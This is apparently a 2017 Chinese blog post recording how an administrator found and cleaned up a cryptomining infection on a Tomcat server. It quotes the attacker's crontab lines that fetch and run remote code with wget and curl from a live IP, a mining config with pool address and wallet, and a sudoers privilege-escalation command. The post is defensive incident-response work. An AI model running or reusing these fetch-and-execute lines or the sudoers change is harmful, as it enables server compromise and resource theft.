Tomcat应用服务器被黑客 肉鸡攻击 记录

原创 2017年07月19日 18:34:04

线上一台应用服务器报警,负载过高,这个就诡异了,因为只是一个普通的服务器,应用使用人员不到10个人,咋会负载高,肯定有问题哪,登陆上去查看,
top查看哪个占据的cpu资源比较多

[root@aew01~]# top
top - 14:27:49 up 423 days, 22:48,  3 users,  load average: 2.10, 1.85, 1.66
Tasks: 166 total,   1 running, 164 sleeping,   0 stopped,   1 zombie
Cpu0  : 45.4%us,  0.8%sy,  0.0%ni, 53.8%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  : 38.2%us,  0.8%sy,  0.0%ni, 59.8%id,  0.0%wa,  0.0%hi,  1.2%si,  0.0%st
Mem:  14389372k total, 14233284k used,   156088k free,    12388k buffers
Swap: 33554428k total,  1511980k used, 32042448k free,    40140k cached

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                                                           
39674 tomcat    20   0  223m 2808  412 S 75.0  0.0   4031:53 atd                                                                                                                                
54892 tomcat    20   0 10.1g 3.6g 4816 S  4.6 26.4 969:07.52 java  


[tomcat@aew01~]$ crontab -l
 */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
 */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh
[tomcat@aew01~]$ 


看到有一个atd进程,这是什么鬼? 查看atd进程

[root@aew01~]# ps -eaf|grep 39674
root     39023 37026  0 14:28 pts/0    00:00:00 grep 39674
tomcat   39674     1 85 Jul15 ?        2-19:12:05 ./atd -c bmsnxvpggm.conf -t 1
[root@aew01~]#



再查看atd执行脚本组件,看到是一个编译之后的可执行组件

[root@aew01~]# find / -name atd
/usr/sbin/atd
/etc/sysconfig/atd
/etc/pam.d/atd
/etc/rc.d/init.d/atd
/var/tmp/atd
[root@aew01~]# more /usr/sbin/atd

******** /usr/sbin/atd: Not a text file ********

[root@aew01~]#



查看配置文件bmsnxvpggm.conf

[root@aew01~]# more /var/tmp/bmsnxvpggm.conf
{
    "url" : "stratum+tcp://94.23.41.130:80",
    "user" : "49mQCzecsC6TS1sNBj5XQX4dNG8MESvLGLPHYJLKohVCQivAB5jJw2xHokTpjtSfE3D8m2U3JjDGEWJMYLrN216CM3dRpBt",
    "pass" : "x",
    "algo" : "cryptonight",
    "quiet" : true
}
[root@aew01~]# 


看来是被盯上了,攻击了。kill掉进程

[root@aew01~]# kill -9 39979
[root@aew01~]# ps -eaf|grep atd
root     40917 37026  0 14:48 pts/0    00:00:00 grep atd
[root@aew01~]# 


然后负载降下来了,但是可恶的是,不到5分钟,负载又上来了,一看又是atd这个进程在运行,进去查看tomcat的crontab任务,发现已经被写进crontab任务了,于是注释掉crontab任务。

    [tomcat@aew01~]$ crontab -l
     */20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh
     */19 * * * * curl http://91.230.47.40/icons/logo.jpg|sh
    [tomcat@aew01~]$ 


然后又查看历史操作,有这样一个命令echo “tomcat ALL=(ALL) ALL” >> /etc/sudoers曾经被执行过

echo “tomcat ALL=(ALL) ALL” >> /etc/sudoers
,于是,为了安全起见,进配置/etc/sudoers文件里面,注释掉 #tomcat ALL=(ALL) ALL这一行,然后重启tomcat应用程序。



彻底检查了下应用服务器所对于的db服务器,发现db没有被攻击,各种数据账号安全,又迅速修改了数据库账号密码等等。


BTY:最终的彻底的解解决方案还是需要应用开发人员,堵住tomcat的漏洞,避免黑客使用tomcat漏洞获得应用服务器的tomcat账号权限,进而登陆应用服务器,将应用服务器做成肉鸡,不停的往外发包。

Linux下执行预定的任务Atd or Crond

inux下面有atd和crond两种计划任务,其中,atd服务使用的at命令只能执行一次,而crond服务使用的crontab定义的命令,是循环作用的,所以crond才符合我们的要求。 cron...

入侵Tomcat服务器一次实战

到网上随便逛逛,我就会发现用JSP制作的电子商务网站多如牛毛,从JSP日渐繁荣的局面来看,适合于各种平台而且免费的Tomcat逐渐成为WEB服务器的一种选择。eBay.com与Dell计算机等知名网站...

JSP注入攻击tomcat服务器小案例

最近学了文件上传下载,但是注意到了一个问题,用户上传普通的比如图片小说,这是没有问题的,但是,如果用户上传了一个可以在服务器执行的文件比如jsp,这问题可就大了。 先演示一段jap注入攻击,...

入侵Tomcat服务器一次实战描述

到网上随便逛逛,我就会发现用JSP制作的电子商务网站多如牛毛,从JSP日渐繁荣的局面来看,适合于各种平台而且免费的Tomcat逐渐成为WEB服务器的一种选择。eBay.com与Dell计算机等知名网站...

Tomcat优化详解

1          概述         本文档主要介绍了Tomcat的性能调优的原理和方法。可作为公司技术人员为客户Tomcat系统调优的技术指南,也可以提供给客户的技术人员作为他们性能调优的...

基于Tomcat 的WEB Project存在的安全漏洞总结

1 检查工具:Acunetix Web Vulnerability Scanner V9破解版 2 检查漏洞说明结果显示: 2.1 HTML Form Without CSRF Protection ...
  • jun55xiu
  • jun55xiu
  • 2015年01月16日 19:02
  • 12006

学了一招,原来tomcat应用这么容易就能入侵

转载地址:http://blog.csdn.net/ljwhx2002/article/details/5972406   这些天我的tomcat目录下莫名其妙的多了个war文件,里面内容...
  • asdqwt
  • asdqwt
  • 2012年08月01日 12:36
  • 3060

mysql主从同步出错解决办法(工作笔记)

mysql主从同步错误解决和Slave_IO_Running: NO    一: Slave I/O: error connecting to master 'backup@192.168.1....

【Web优化】Yslow优化法则(一)最小化HTTP请求数。

Yahoo提出的前段优化的最佳实践,称为YSLOW优化法则。主要包括七个类别的优化: 内容(content)、服务器端、Cookie、CSS、JavaScript、image和mobile(主要针对...

tomcat6 应用服务器

  • 2010年07月28日 18:35
  • 65KB
  • 下载
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Tomcat应用服务器被黑客 肉鸡攻击 记录
举报原因:
原因补充:

(最多只允许输入30个字)